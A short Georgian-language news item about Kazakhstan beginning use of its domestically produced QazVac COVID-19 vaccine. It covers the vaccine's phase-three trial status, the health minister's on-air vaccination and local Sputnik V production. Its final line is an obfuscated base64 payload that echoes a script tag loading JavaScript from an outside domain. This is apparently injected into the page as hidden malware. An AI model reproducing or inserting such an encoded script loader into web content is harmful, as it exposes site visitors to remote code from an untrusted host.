celsiusi
ავერსი შნაიდერი
ყაზახეთმა დაიწყო ადგილობრივი წარმოების კორონავირუსის საწინააღმდეგო ვაქცინის QazVac-ის გამოყენება.
 
France-Presse-ს მიხედვით, ვაქცინის პირველი 50 000 დოზა სახელმწიფო კვლევით ინსიტუტში დამზადდა. იმუნიზაციის სრული პროგრამისთვის ვაქცინის ორი დოზის მიღებაა საჭირო. ამჟამად ვაქცინა გამოცდის მესამე ეტაპს გადის.
 
მიუხედავად იმისა, რომ ვაქცინის გამოცდის მესამე ეტაპი არ დასრულებულა, იგი პირდაპირ ეთერში მიიღო ქვეყნის ჯანდაცვის მინისტრმა ალექსეი ცოიმ, რომელმაც განაცხადა, რომ იმუნიზაციის შემდეგ, თავს კარგად გრძნობს.
 
მისივე განცხადებით, ყაზახეთის მთავრობა მოლაპარაკებებს აწარმოებს თურქ პარტნიორებთან, ვაქცინის დამატებითი პარტიების საწარმოებლად.
 
გასულ კვირას ქვეყნის პრეზიდენტმა ყასიმ-ჟომართ თოყაევმა ხაზი გაუსვა იმას, რომ ყაზახეთი არის ერთ-ერთი იმ მცირე სახელმწიფოთაგან, რომელმაც შეძლო ვაქცინის განვითარება.
 
გარდა QazVac-ის წარმოებისა, ყაზახეთი გახდა პირველი უცხოური ქვეყანა, სადაც რუსული სპუტნიკ V-ის წარმოება დაიწყეს.
 
ამჟამად ქვეყანაში ვაქცინაციის პროცესი სწორედ რუსული და ყაზახური ვაქცინებით მიმდინარეობს.
1073
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");